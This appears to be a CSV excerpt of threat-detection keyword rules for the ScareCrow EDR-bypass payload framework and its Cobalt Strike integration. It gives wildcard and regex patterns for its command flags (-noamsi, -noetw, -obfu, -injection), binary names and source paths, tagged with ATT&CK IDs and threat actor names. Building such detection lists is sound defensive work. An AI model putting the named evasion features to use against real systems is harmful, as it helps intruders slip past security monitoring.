"*ScareCrow* -injection*",".{0,1000}ScareCrow.{0,1000}\s\-injection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58130"
"*ScareCrow* -Loader * ",".{0,1000}ScareCrow.{0,1000}\s\-Loader\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58131"
"*ScareCrow* -noamsi*",".{0,1000}ScareCrow.{0,1000}\s\-noamsi.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58132"
"*ScareCrow* -noetw*",".{0,1000}ScareCrow.{0,1000}\s\-noetw.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58133"
"*ScareCrow* -obfu*",".{0,1000}ScareCrow.{0,1000}\s\-obfu.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58134"
"*ScareCrow*_darwin_amd64*",".{0,1000}ScareCrow.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58135"
"*ScareCrow*_windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58136"
"*ScareCrow*KnownDLL*",".{0,1000}ScareCrow.{0,1000}KnownDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58137"
"*ScareCrow*ProcessInjection*",".{0,1000}ScareCrow.{0,1000}ProcessInjection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58138"
"*ScareCrow*windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58139"
"*ScareCrow.cna*",".{0,1000}ScareCrow\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","58140"
"*ScareCrow.go*",".{0,1000}ScareCrow\.go.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58141"
"*ScareCrow/Cryptor*",".{0,1000}ScareCrow\/Cryptor.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58142"
"*ScareCrow/limelighter*",".{0,1000}ScareCrow\/limelighter.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58143"
"*ScareCrow/Loader*",".{0,1000}ScareCrow\/Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58144"
"*ScareCrow/Utils*",".{0,1000}ScareCrow\/Utils.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58145"
"*ScareCrow_*_darwin_amd64*",".{0,1000}ScareCrow_.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58146"
"*ScareCrow_*_linux_amd64*",".{0,1000}ScareCrow_.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58147"
"*ScareCrow_*amd64*",".{0,1000}ScareCrow_.{0,1000}amd64.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58148"
